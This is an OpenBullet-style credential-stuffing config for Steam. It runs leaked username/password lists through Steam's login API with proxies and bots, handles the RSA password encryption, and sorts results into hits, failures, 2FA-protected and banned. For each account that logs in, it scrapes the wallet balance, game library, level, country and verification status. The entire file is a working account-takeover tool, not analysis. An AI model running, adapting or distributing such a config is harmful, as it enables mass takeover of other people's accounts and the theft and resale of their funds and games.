[SETTINGS]
{
  "Name": "Steam by matt",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-06-24T21:54:18.2669935+02:00",
  "AdditionalInfo": "",
  "Author": "matt",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://store.steampowered.com/login/?l=english" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check_for_ban KEYCHECK 
  KEYCHAIN Ban OR 
    KEY "<SOURCE>" DoesNotContain "<title>Login</title>" 
  KEYCHAIN Success OR 
    KEY "<title>Login</title>" 

REQUEST POST "https://store.steampowered.com/login/getrsakey/" 
  CONTENT "username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/javascript, text/html, application/xml, text/xml, */*" 
  HEADER "referer: https://store.steampowered.com/login/?l=english" 

#KEY PARSE "<SOURCE>" LR ",\"publickey_mod\":\"" "\",\"" -> VAR "KEY" 

#EXP PARSE "<SOURCE>" LR "publickey_exp\":\"" "\",\"" -> VAR "EXP" 

#TIMESTAMP PARSE "<SOURCE>" LR "timestamp\":\"" "\",\"" -> VAR "TIMESTAMP" 

#KEYFIX FUNCTION RSA "<KEY>" "<EXP>" "<PASS>" -> VAR "KEYFIX" 

#URL FUNCTION URLEncode "<KEYFIX>" -> VAR "URL" 

#Login REQUEST POST "https://store.steampowered.com/login/dologin/" EncodeContent=TRUE 
  CONTENT "username=<USER>&emailauth=&captchagid=&captcha_text=&emailsteamid=&password=<URL>&rsatimestamp=<TIMESTAMP>&remember_login=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/javascript, text/html, application/xml, text/xml, */*" 
  HEADER "referer: https://store.steampowered.com/login/?l=english" 

#Check KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect account name or password." 
    KEY "The account name or password that you have entered is incorrect" 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY ",\"requires_twofactor\":true" 
    KEY "emailauth_needed\":true" 
  KEYCHAIN Ban OR 
    KEY "captcha_needed\":true" 

#2FA PARSE "<SOURCE>" LR ",\"requires_twofactor\":" ",\"" -> VAR "2FA" 

#Steam_ID PARSE "<SOURCE>" LR "steamid\":\"" "\",\"" -> CAP "Steam ID" 

#2FA_off FUNCTION Replace "false" "Off" "<2FA>" -> CAP "2FA" 

#2FA_on FUNCTION Replace "true" "on" "<2FA>" -> CAP "2FA" 

#Capture REQUEST GET "https://steamcommunity.com/profiles/<Steam ID>/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Level PARSE "<SOURCE>" LR "\"><span class=\"friendPlayerLevelNum\">" "</span></div></div>" -> CAP "Level" 

#Capture REQUEST GET "https://store.steampowered.com/account/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Balance PARSE "<SOURCE>" LR "<div class=\"accountData price\">" "</div>" -> CAP "Balance" 

#Verified PARSE "<SOURCE>" LR "1543\">" "</a>" -> CAP "Verified Status" 

#Country PARSE "<SOURCE>" LR "<span class=\"account_data_field\">" "</span>" -> CAP "Country" 

#Capture REQUEST GET "https://steamcommunity.com/profiles/<Steam ID>/games/?tab=all" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Games PARSE "<SOURCE>" LR "var rgGames =" "var rgChangingGames =" -> VAR "Games Function" 

#Count_Games FUNCTION CountOccurrences ",\"name\":\"" "<Games Function>" -> CAP "Total Games" 

#Games PARSE "<SOURCE>" LR ",\"name\":\"" "\",\"" -> CAP "Games" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<div class=\"accountData price\">0" 
    KEY "<SOURCE>" DoesNotContain ",\"name\":\"" 

